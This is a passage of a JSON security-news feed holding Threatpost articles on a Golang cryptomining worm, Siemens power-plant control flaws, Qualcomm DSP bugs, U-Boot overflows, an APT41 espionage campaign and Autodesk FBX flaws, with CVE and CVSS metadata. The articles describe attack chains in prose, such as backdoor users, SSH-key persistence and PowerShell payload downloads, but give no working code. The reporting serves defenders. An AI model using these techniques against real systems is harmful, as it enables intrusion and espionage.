it will use a known method for achieving remote code-execution \u201cby dumping the db file into cron path,\u201d according to Barracuda.\n\n\u201cSome of the exploits the malware includes are targeting the ThinkPHP web application framework, which is popular in China,\u201d according to the report. \u201cAs in other families of malwares, it is safe to assume that this malware will keep evolving, employing more and more exploits.\u201d\n\n## **A Golang Malware**\n\nNotably, the malware is written in the Go language (Golang).\n\nGolang is a 10-year-old compiled programming language designed by Google. According to F5 Networks, [which discovered](<https://www.f5.com/labs/articles/threat-intelligence/new-golang-malware-is-spreading-via-multiple-exploits-to-mine-mo>) the first iteration of the malware last summer, applications written in Go tend to be bulkier than others as the functions imported from other libraries are compiled in the binary itself. It also has a unique way of calling functions and storing symbols and data.\n\n\u201cAlthough the language is about 10 years old, and is used by many legitimate programmers, there has not been as much activity with Golang malware,\u201d according to F5. That said, in April, another wormable Golang loader known as Kinsing [was spotted](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) dropping XMRig onto Docker instances.\n\n## **Under the Hood**\n\nOnce the malware infects a machine, it downloads a set of files that are customized based on the platform it is attacking. One of those files positions the malware for doing more damage than simply installing a cryptominer.\n\nThe file sets typically include the initial loader pacyload, an update script, a cryptominer and its configuration file, a watchdog, a scanner and a config file for the cryptominer, Barracuda noted.\n\nOut of these files, the watchdog makes sure that the scanner and miner are up and running and that all components are up to date.\n\n\u201cIf it fails to connect to the command-and-control server (C2), it will try to fetch the address of a new server by parsing transactions on a specific Ethereum account,\u201d explained the researchers.\n\nThe scanner file meanwhile is the malware\u2019s worm propagation mechanism. It automatically scans the internet for vulnerable machines by generating random IP addresses and trying to attack the machines behind them. Once it infects a target, it reports back to the C2 about the success.\n\nFor Windows machines, the malware also adds a backdoor user, researchers found \u2013 essentially just adding another user to the system. An init/update script accomplishes this on the Linux side, according to the analysis, by adding authorized SSH key to the system.\n\n\u201cAlthough the malware includes components which constantly check for updates and help persist the attack, the installed backdoor user grants another level of control to the operators,\u201d Erez Turjeman, senior software engineer and a security researcher for Barracuda Labs, told Theatpost. \u201cThis can be used for deploying additional attacks on the victim\u2019s machine and network, beyond the scope of cryptomining.\u201d\n\nHe added, \u201cThe cryptomining component in this malware can be easily replaced by the operators into some other functionality, meaning that we might see other variants used for other purposes in the future.\u201d\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-06-25T18:30:59", "type": "threatpost", "title": "Golang Worm Widens Scope to Windows, Adds Payload Capacity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271", "CVE-2018-20062", "CVE-2018-7600", "CVE-2020-5135"], "modified": "2020-06-25T18:30:59", "id": "THREATPOST:9530BF61FA72CF3E2B226C171BB8C5E7", "href": "https://threatpost.com/worm-golang-malware-windows-payloads/156924/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-16T23:22:29", "description": "Siemens industrial equipment commonly found in fossil-fuel and large-scale renewable power plants are riddled with multiple security vulnerabilities, the most severe of which are critical bugs allowing remote code-execution.\n\nThe affected product is SPPA-T3000, a distributed control system used for orchestrating and supervising electrical generation at major power plants in the U.S., Germany, Russia and other countries. It is plagued with 17 different bugs, uncovered by researchers at Positive Technologies.\n\n\u201cBy exploiting some of these vulnerabilities, an attacker could run arbitrary code on an application server, thereby taking control of operations and disrupting them,\u201d Vladimir Nazarov, head of ICS security at Positive Technologies, said in a media advisory issued on Thursday. \u201cThis could potentially stop electrical generation and cause malfunctions at power plants where vulnerable systems are installed.\u201d\n\nThe vulnerabilities were discovered in two specific components of the platform: The application server (seven bugs) and the migration server (10 found).\n\nThe most severe of the issues can enable RCE on the application server. For instance, CVE-2019-18283, a critical deserialization of untrusted data bug, would allow an attacker to \u201cgain remote code-execution by sending specifically crafted objects to one of its functions,\u201d according to [Siemens\u2019 advisory](<https://cert-portal.siemens.com/productcert/pdf/ssa-451445.pdf>).\n\nTwo other critical vulnerabilities, CVE-2019-18315 and CVE-2019-18316, would allow an attacker with network access to the application server to gain RCE by sending specifically crafted packets to the 8888/TCP and 1099/TCP ports, respectively. And CVE-2019-18314, another critical improper authentication flaw, would allow such an attacker to gain RCE by sending specifically crafted objects via a Remote Method Invocation (RMI).\n\n\u201cAn additional 10 vulnerabilities were found in the MS-3000 migration server,\u201d according to Positive Technologies\u2019 statement. \u201cOf these, two enable remote reading and writing of arbitrary files. For example, an attacker could read /etc/shadow, which contains hashes that could be used for brute-forcing user passwords. Several heap overflows were identified, which could be exploited as part of denial-of-service (against the migration server) or other attacks.\u201d\n\nOne notable flaw is CVE-2019-18313, a critical unrestricted upload bug, which exposes remote procedure calls (RPCs) intended for administration, by not requiring authentication. This would allow an attacker with network access to the MS-3000 Server component to gain RCE by sending specifically crafted objects to one of the RPC services, according to Positive Technologies.\n\nSiemens noted that exploitation of any of the vulnerabilities requires access to either Siemens\u2019 Application or Automation Highway (the networks linking the components).\n\n\u201cBoth highways should not be exposed if the environment has been set up according to the recommended Siemens\u2019 [operational guidelines](<https://assets.new.siemens.com/siemens/assets/api/uuid:411e91564a2d259ecd4b6c79b51f89c044b3de81/operational-guidelines-industrial-security-en.pdf>),\u201d the vendor noted.\n\nSiemens said that it\u2019s working on updates; in the meantime, power plants should restrict access to the Application Highway using the SPPA-T3000 Firewall, and there should be no bridging of an external network to either the Application or Automation highways, it said.\n\nNone of the bugs has been seen being exploited in the wild, according to Siemens.\n", "cvss3": {}, "published": "2019-12-12T21:55:55", "type": "threatpost", "title": "Critical Remote Code-Execution Bugs Threaten Global Power Plants", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-18283", "CVE-2019-18313", "CVE-2019-18314", "CVE-2019-18315", "CVE-2019-18316", "CVE-2020-5135"], "modified": "2019-12-12T21:55:55", "id": "THREATPOST:AD7CBD7ADE9D9F9DE3BBDB1AE8A6F81D", "href": "https://threatpost.com/critical-remote-code-execution-global-power-plants/151087/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-16T22:19:02", "description": "Six serious bugs in Qualcomm\u2019s Snapdragon mobile chipset impact up to 40 percent of Android phones in use, according research released at the [DEF CON Safe Mode](<https://www.defcon.org/html/defcon-safemode/dc-safemode-schedule.html>) security conference Friday.\n\nThe flaws open up handsets made by Google, Samsung, LG, Xiaomi and OnePlus to DoS and escalation-of-privileges attacks \u2013 ultimately giving hackers control of targeted handsets. Slava Makkaveev, a security researcher with Check Point, [outlined his discovery](<https://blog.checkpoint.com/2020/08/06/achilles-small-chip-big-peril/>) and said while Qualcomm has provided patches for the bug, most OEM handset makers have not yet pushed out the patches.\n\n[](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)\n\nClick to register!\n\nThe faulty Qualcomm component is the mobile chip giant\u2019s Snapdragon SoC and the Hexagon architecture. Hexagon a brand name for Qualcomm\u2019s digital signal processor (DSP), part of the SoC\u2019s microarchitecture. DSP controls the processing of real-time request between the Android user environment and the Snapdragon processor\u2019s firmware \u2013 in charge of turning voice, video and services such GPS location sensors into computationally actionable data.\n\nMakkaveev said the DSP flaws can be used to harvest photos, videos, call recordings, real-time microphone data, and GPS and location data. A hacker could also cripple a targeted phone or implant malware that would go undetected.\n\nThe six flaws are CVE-2020-11201, CVE-2020-11202, CVE-2020-11206, CVE-2020-11207, CVE-2020-11208 and CVE-2020-11209. Using a fuzzing technique against handsets with the vulnerable chipset, Check Point was able to identify 400 discrete attacks.\n\nThe prerequisite for exploiting the vulnerabilities is the target would need to be coaxed into downloading and running a rogue executable.\n\nQualcomm declined to answer specific questions regarding the bugs and instead issued a statement:\n\n_\u201cProviding technologies that support robust security and privacy is a priority for Qualcomm. Regarding the Qualcomm Compute DSP vulnerability disclosed by Check Point, we worked diligently to validate the issue and make appropriate mitigations available to OEMs. We have no evidence it is currently being exploited. We encourage end users to update their devices as patches become available and to only install applications from trusted locations such as the Google Play Store.\u201d_ \u2013 Qualcomm Spokesperson\n\nThe flaws were brought to Qualcomm\u2019s attention between February and March. Patches developed by Qualcomm in July. A cursory review of vulnerabilities patched in the July and [August Google Android Security Bulletins](<https://threatpost.com/high-severity-android-rce-flaw-fixed-in-august-security-update/158049/>) reveal patches haven\u2019t been yet been pushed to handsets. For that reason, Check Point chose not to reveal technical specifics of the flaws.\n\nWhat technical details that are available can be found in a DEF CON Safe Mode video posted to online. Here Makkaveev shares some technical specifics.\n\nThe focus of Check Point\u2019s research was on the Snapdragon Hexagon SoC and the DSP chip architecture and the aDSP and cDSP subsets, the [researcher noted during his session](<https://www.defcon.org/html/defcon-safemode/dc-safemode-speakers.html#Makkaveev>).\n\nThe researchers further focused on the communications between Android handset CPU and the Qualcomm DSP within the Hexagon framework. Communication between the Android operating environment and the DSP Qualcomm firmware generates data that is stored in a separate library (called skeleton libraries) within a shared memory channel.\n\nThe skeleton library acts as the glue between the Android instruction and DSP instructions. Functions inside the skeleton library are a \u201cblack box\u201d and proprietary. However, Check Point found the DSP library is accessible to developers via the Qualcomm Hexagon software developers kit (SDK). From their researchers were able to developed instructions to crash, downgrade and execute code within the DSP process.\n\n\u201cHexagon SDK is the official way for the vendors to prepare DSP related code. We discovered serious bugs in the SDK that have led to the hundreds of hidden vulnerabilities in the Qualcomm-owned and vendors\u2019 code. The truth is that almost all DSP executable libraries embedded in Qualcomm-based smartphones are vulnerable to attacks due to issues in the Hexagon SDK,\u201d researchers noted.\n\nAttacks allow attackers to create persistent DoS conditions on a handset \u2013 until the hardware is factory reset. An attack could also include a DSP kernel panic that reboots the phone. And because, according the Check Point, mobile antivirus protection doesn\u2019t scan Hexagon instruction sets, an adversary can hide malicious code within the DSP skeleton library.\n\n\u201cThe DSP is responsible for preprocessing streaming video from camera sensors,\u201d researchers wrote. So, \u201can attacker can take over this flow\u2026 The next step is gain privileges of the guest OS.\u201d\n\nIn a video demo, [posted online](<https://youtu.be/CrLJ29quZY8>), Check Point demonstrated an escalation of privileges attack that allows an attacker to gain control of the targeted system.\n\n\u201cQualcomm aDSP and cDSP subsystems are very promising areas for security research,\u201d Makkaveev said. \u201cThe DSP is accessible for invocations from third-party Android applications. The DSP processes personal information such as video and voice data that passes through the device\u2019s sensors. As we have proven, there are many security issues in the DSP components.\u201d\n\n_**Complimentary Threatpost Webinar**__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts from Microsoft and __Fortanix together to explore how **Confidential Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2pm ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix \u2013 both with the Confidential Computing Consortium. **[Register Now](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**._\n", "cvss3": {}, "published": "2020-08-07T22:11:58", "type": "threatpost", "title": "Qualcomm Bugs Open 40 Percent of Android Handsets to Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-11201", "CVE-2020-11202", "CVE-2020-11206", "CVE-2020-11207", "CVE-2020-11208", "CVE-2020-11209", "CVE-2020-5135"], "modified": "2020-08-07T22:11:58", "id": "THREATPOST:DB4FE6FEC73D65579261FF6697220766", "href": "https://threatpost.com/qualcomm-bugs-opens-40-percent-of-android-devices-to-attack/158194/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:29:26", "description": "Multiple vulnerabilities have been found in [Das U-Boot](<https://www.denx.de/wiki/U-Boot>), a universal bootloader commonly used in embedded devices like Amazon Kindles, ARM Chromebooks and networking hardware. The bugs could allow attackers to gain full control of an impacted device\u2019s CPU and modify anything they choose.\n\nResearchers at ForAllSecure found the flaws in U-Boot\u2019s file system drivers. They include a recursive stack overflow in the DOS partition parser, a pair of buffer-overflows in ext4 and a double-free memory corruption flaw in ext4. They open the door to denial-of-service attacks, device takeover and code-execution.\n\nThere are both local and remote paths to exploitation for these flaws. If a vulnerable device is configured to boot from external media, such as an SD card or USB drive, attackers with physical access could subvert the normal boot process of the device and control the loading of the operating system, giving them substantial control over the device.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIf the device is configured to network boot, remote attackers could use an initial method to compromise the corporate or Wi-Fi network that a target device is attached to (including social-engineering malware onto a victim\u2019s endpoint or exploiting known vulnerabilities), and from there attacking the U-Boot device from that local network location.\n\n\u201cThe most obvious route for exploitation requires physical access, and could either cause denial of service (possible device bricking) or could subvert the boot process for a device or possibly bypass trusted boot,\u201d Maxwell Koo, ForAllSecure analysis engineer, told Threatpost in an interview. \u201cIf device is configured to allow pxe boot and is configured with CONFIG_CMD_FS_GENERIC, there is a possible network avenue of exploitation via CVE-2019-13104 through -13106, with the same impact.\u201d\n\nHe added, \u201cI\u2019d say it would take moderate-to-high expertise to develop an initial exploit for a given device.\u201d\n\n## Technical Details\n\nCVE-2019-13103 is a stack overflow that affects all versions of U-Boot in the archives, which occurs when reading a DOS partition table, which refers to itself. This causes the \u201cpart_get_info_extended\u201d function to call itself repeatedly with the same arguments, causing unbounded stack growth.\n\n\u201cOn QEMU\u2019s vexpress-a15 board, the CPU returns to 0 but continues executing NOPs until it hits data and executes it,\u201d according to the [GitHub write-up](<https://gist.github.com/deephooloovoo/d91b81a1674b4750e662dfae93804d75>) from the ForAllSecure interns who discovered the flaws, Paul Emge and Zion Basque.\n\nIn a technical analysis shared with Threatpost, the researchers explained that in testing, an emulated [ARM CPU](<https://threatpost.com/google-arm-android-bugs-memory-tagging/146950/>) \u201cis happy to execute a bunch of NOPs from this memory location, until, after many megabytes, it reaches some data and returns to 0 again.\u201d This would lead to DoS, but depending on the exact system and software installed, something worse could happen.\n\n\u201cFor example, other data in this part of the address space could get executed and lead to other anomalous behaviors, including the ability to run attacker provided code,\u201d they wrote.\n\nAs for the buffer-overflow flaws, CVE-2019-13104 affects U-Boot versions 2016.11-rc1 through 2019.07-rc4. At ext4fs.c:74 it is possible for len to underflow while listing files in a crafted filesystem.\n\n\u201cIf this happens, eventually there is a memcpy with a negative (so effectively infinite) length,\u201d the research pair wrote. \u201cThis causes all of memory to be overwritten until [in sandbox testing], it segfaults\u2026There\u2019s definitely memory corruption.\u201d\n\nThe second, more serious buffer-overflow issue is CVE-2019-13106, affecting U-Boot versions 2016.09 through 2019.07-rc4.. The ext4 code can overwrite portions of the stack with 0s in the ext4fs_read_file function, while listing files in an untrusted filesystem. Researchers said that the bug could \u201ceasily give complete control of the CPU,\u201d which would defeat verified boot.\n\n\u201cThe bug occurs when a filename (or potentially some other structure) is located across a block boundary,\u201d explained the researchers in the GitHub post. \u201cThe number of 0s written to the stack is controllable by changing the position of the filename.\u201d\n\nAnd in CVE-2019-13105, which affects U-Boot versions 2019.07-rc1 through 2019.07-rc4, if there is an invalid/out-of bounds block number, ext_cache_read doesn\u2019t set the freed cache->buf to 0, which results in a double-free issue in ext_cache_ini. A double-free vulnerability occurs when, as the name says, a variable is free()\u2019d twice. The variable is still usable, but the memory pointed to that variable can be free.\n\nForAllSecure also found five low-severity divide-by-zero bugs, triggered by invalid extended file systems.\n\nU-Boot patched the bugs as of its v. 2019.10 release \u2013 but devices are likely still vulnerable given that the update process is controlled by the vendor of the device rather than U-Boot itself.\n\n\u201cAs a bootloader, which is often used in embedded devices with a long/non-existent update cycle, the unpatched code is likely present and will remain present on many devices for some time,\u201d Koo told Threatpost. \u201cSeverity depends somewhat on configuration of the device in question (U-Boot is pretty configurable and this will differ a lot between devices).\u201d\n\nAmazon did not immediately respond to a request for comment.\n\nIf support for DOS partitions or ext4 filesystem images is not present in the U-Boot configuration of a device, then the bugs have impact.\n\n**_What are the top risks to modern enterprises in the peak era of data breaches? Find out: Join breach expert Chip Witt from SpyCloud and Threatpost senior editor Tara Seals, in our upcoming free _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)**_, \u201cTrends in Fortune 1000 Breach Exposure.\u201d _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)**_._**\n", "cvss3": {}, "published": "2019-11-07T17:31:06", "type": "threatpost", "title": "Amazon Kindle, Embedded Devices Open to Code-Execution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-13103", "CVE-2019-13104", "CVE-2019-13105", "CVE-2019-13106", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2019-11-07T17:31:06", "id": "THREATPOST:D0762E9D61E59AD261E8F24340AE261C", "href": "https://threatpost.com/amazon-kindle-embedded-devices-code-execution/150003/", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2020-10-15T22:22:15", "description": "Researchers warn that APT41, a notorious China-linked threat group, has targeted more than 75 organizations worldwide in \u201cone of the broadest campaigns by a Chinese cyber-espionage actor observed in recent years.\u201d\n\nBetween Jan. 20 and March 11, researchers observed APT41 exploiting vulnerabilities in Citrix NetScaler/ADC, Cisco routers and Zoho ManageEngine Desktop Central as part of the widespread espionage campaign. Researchers said it\u2019s unclear if APT41 attempted exploitation en masse, or if they honed in on specific organizations \u2014 but the victims do appear to be more targeted in nature.\n\n\u201cWhile APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of NetSarang software, this scanning and exploitation has focused on a subset of our customers, and seems to reveal a high operational tempo and wide collection requirements for APT41,\u201d wrote Christopher Glyer, Dan Perez, Sarah Jones and Steve Miller with FireEye, in a [Wednesday analysis](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nDozens of companies were targeted from varying industries, including banking and finance, defense industrial bases, government, healthcare, legal, manufacturing, media, non-profit, oil and gas, transportation and utilities. APT41 also targeted firms from a broad array of countries, including Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, the U.K. and the U.S.\n\n**Cisco, Citrix and Zoho Exploits**\n\nStarting on Jan. 20, researchers observed the threat group attempting to exploit the notorious flaw ([CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)) in Citrix Application Delivery Controller (ADC) and Citrix Gateway devices revealed as a zero-day then patched earlier this year. It was [disclosed on Dec. 17](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>) \u2013 and [proof of concept (PoC) code](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) was released shortly after \u2013 before a patch [was issued in January](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>).\n\nIn this campaign, researchers observed three waves of exploits against [CVE-2019-19781](<https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/>) \u2013 the first on Jan. 20 \u2013 21, the second on Feb. 1, and finally a \u201csignificant uptick\u201d in exploitation on Feb. 24 \u2013 25.\n\nPost-exploit, APT41 executed a command (\u2018file /bin/pwd\u2019) on affected systems that researchers say may have achieved two objectives: \u201cFirst, it would confirm whether the system was vulnerable and the mitigation wasn\u2019t applied,\u201d researchers noted. \u201cSecond, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step.\u201d\n\nOn Feb. 21, researchers next observed APT41 switching gears to exploit a Cisco RV320 router (Cisco\u2019s WAN VPN routers for small businesses) at a telecommunications organization. After exploitation, the threat actors downloaded an executable and linkable format (ELF) binary payload. Researchers aren\u2019t sure what specific exploit was used in this case, but pointed to a Metasploit module combining two CVEs ([CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) and [CVE-2019-1652](<https://nvd.nist.gov/vuln/detail/CVE-2019-1652>)) to [enable remote code execution on Cisco RV320 and RV325](<https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv32x_rce>) small business routers.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/03/25112442/APT41-timeline.png>)\n\nFinally, on March 8, the threat actor was observed [exploiting a critical vulnerability](<https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/>) in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. The flaw ([CVE-2020-10189)](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) was first disclosed on March 5 as a zero-day, and [was later patched](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) on March 7. The attackers exploited the flaw to deploy payloads (install.bat and storesyncsvc.dll) in two ways. First, after exploiting the flaw they directly uploaded a simple Java-based program (\u201clogger.zip\u201d) containing a set of commands, which then used PowerShell to download and execute the payloads. In a second attack, APT41 leveraged a legitimate Microsoft command-line tool, BITSAdmin, to download the payload.\n\nNotably, after exploitation, the attackers have been seen only leveraging publicly available malware, including Cobalt Strike (a [commercially available exploitation framework](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>)) and Meterpreter (a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code). Said researchers: \u201cWhile these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance.\u201d\n\n**APT41 Activity **\n\nInterestingly, between waves of exploitation, researchers observed a lull in APT41 activity. The first lull, between Jan. 23 and Feb. 1, was likely related to the Chinese Lunar New Year holidays (which occurred Jan. 24 \u2013 30): \u201cThis has been a common activity pattern by Chinese APT groups in past years as well,\u201d said researchers.\n\nThe second lull, occurring Feb. 2 \u2013 19, may have been related to fallout from the rapid spread of the coronavirus pandemic. Researchers noted that China had initiated [COVID-19 related quarantines](<https://threatpost.com/coronavirus-themed-cyberattacks-persists/153493/>) in cities in the Hubei province Jan. 23 \u2013 24, and rolled out quarantines to additional provinces starting between Feb. 2 and Feb. 10.\n\n\u201cWhile it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry,\u201d said researchers.\n\nThey also said that [APT41 ](<https://threatpost.com/fortnite-ransomware-masquerades-as-an-aimbot-game-hack/147549/>) has [historically](<https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html>) (since 2012) conducted dual Chinese state-sponsored espionage activity and personal, financially motivated activity. More recently, in October 2019, the [threat group was discovered](<https://threatpost.com/china-hackers-spy-texts-messagetap-malware/149761/>) using a new malware strain to intercept telecom SMS server traffic and sniff out certain phone numbers and SMS messages \u2013 particularly those with keywords relating to Chinese political dissidents.\n\n\u201cIn 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks,\u201d said researchers on Wednesday. \u201cThis new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage.\u201d\n\n[](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "cvss3": {}, "published": "2020-03-25T15:57:25", "type": "threatpost", "title": "Chinese Hackers Exploit Cisco, Citrix Flaws in Massive Espionage Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653", "CVE-2019-19781", "CVE-2020-10189", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-03-25T15:57:25", "id": "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "href": "https://threatpost.com/chinese-hackers-exploit-cisco-citrix-espionage/154133/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:26:11", "description": "[](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)Microsoft has released an out-of-band security update for Microsoft Office, Office 365 ProPlus and Paint 3D. The applications are affected by multiple Autodesk vulnerabilities that, if exploited, could enable remote code execution.\n\nThe flaws, all rated \u201cimportant\u201d in severity, are tied to six CVEs stemming from Autodesk\u2019s library for FBX, a popular file format format that supports 3D models. This library is integrated into certain Microsoft applications.\n\n\u201cRemote code execution vulnerabilities exist in Microsoft products that utilize the FBX library when processing specially crafted 3D content,\u201d according to [Microsoft\u2019s Tuesday advisory.](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200004?ranMID=24542&ranEAID=IokOf8qagZo&ranSiteID=IokOf8qagZo-LorH75TOMrNNXxih0rIvFw&epi=IokOf8qagZo-LorH75TOMrNNXxih0rIvFw&irgwc=1&OCID=AID2000142_aff_7593_1243925&tduid=\\(ir__hxzf2lfk6kkfr1ifkk0sohzn0m2xnhuncwgltrsd00\\)\\(7593\\)\\(1243925\\)\\(IokOf8qagZo-LorH75TOMrNNXxih0rIvFw\\)\\(\\)&irclickid=_hxzf2lfk6kkfr1ifkk0sohzn0m2xnhuncwgltrsd00>)\n\nAffected products include Office 365 ProPlus (for 32- and 64-bit systems), which is Microsoft\u2019s subscription that comes with premium apps like Word, Excel, PowerPoint, Outlook and Teams; as well as Paint 3D (formerly known as Microsoft Paint), Microsoft\u2019s 3D modeling and printing application. Microsoft Office 2016 (Click-to-Run for 32- and 64-bit editions) and Microsoft Office 2019 (for 32- and 64-bit editions) are also impacted.\n\n**The Flaws**\n\nThe Autodesk flaws all stem from FBX\u2019s software development kit (SDK). They include a high-severity buffer overflow flaw ([CVE-2020-7080](<https://nvd.nist.gov/vuln/detail/CVE-2020-7080>)) that could enable an attacker to run arbitrary code, a type confusion vulnerability ([CVE-2020-7081](<https://nvd.nist.gov/vuln/detail/CVE-2020-7081>)) that could allow an attacker to read/write out-of-bounds memory location or run arbitrary code on the system or lead to denial-of-service (DoS), and a use-after-free glitch ([CVE-2020-7082](<https://nvd.nist.gov/vuln/detail/CVE-2020-7082>)) that could cause an application to reference a memory location controlled by an unauthorized third party \u2013 allowing them to run arbitrary code on the system.\n\nOther flaws include an integer overflow vulnerability ([CVE-2020-7083](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7083>)) that could be abused to cause the application to crash (leading to DoS), and a Null Pointer Dereference vulnerability ([CVE-2020-7084](<https://nvd.nist.gov/vuln/detail/CVE-2020-7084>)) that could enable a DoS attack.\n\nFinally, a high-severity heap overflow flaw in vulnerable FBX parsers ([CVE-2020-7085](<https://nvd.nist.gov/vuln/detail/CVE-2020-7085>)) can be abused to obtain a limited code execution by altering certain values in a FBX file, causing the application to run arbitrary code on the system.\n\nThe latter flaw was reported by F-Secure security researcher Max Van Amerongen, who demonstrated his proof-of-concept (PoC) exploit for the flaw [on Twitter](<https://twitter.com/maxpl0it/status/1251060962951659520>).\n\n> My Autodesk FBX Heap Overflow (CVE-2020-7085) has now been disclosed at <https://t.co/jvumWcCZE7>\n> \n> Works on FBX SDK < 2019.5\n> \n> PoC video from disclosure: [pic.twitter.com/vayCIomgaP](<https://t.co/vayCIomgaP>)\n> \n> \u2014 maxpl0it (@maxpl0it) [April 17, 2020](<https://twitter.com/maxpl0it/status/1251060962951659520?ref_src=twsrc%5Etfw>)\n\n**Real Life Attack**\n\nIn a real life scenario, an attacker would need to send a specially crafted file (containing 3D content) to a user and convince them to open it in order to exploit the flaws.\n\nAn attacker who successfully exploited these vulnerabilities could gain the same user rights as the local user, according to Microsoft.\n\n\u201cUsers whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\u201d it said.\n\nThe security updates addresses these vulnerabilities by correcting the way 3D content is handled by Microsoft software.\n\nThe patches were out-of-band, meaning they were outside of [Microsoft\u2019s regularly scheduled Patch Tuesday updates](<https://threatpost.com/april-patch-tuesday-microsoft-active-exploit/154794/>). For its April 2020 Patch Tuesday updates, Microsoft disclosed 113 vulnerabilities \u2013 including 19 rated as critical, and 94 rated as important, and three being exploited in the wild.\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-22T14:35:22", "type": "threatpost", "title": "Microsoft Issues Out-Of-Band Security Update For Office, Paint 3D", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135", "CVE-2020-7080", "CVE-2020-7081", 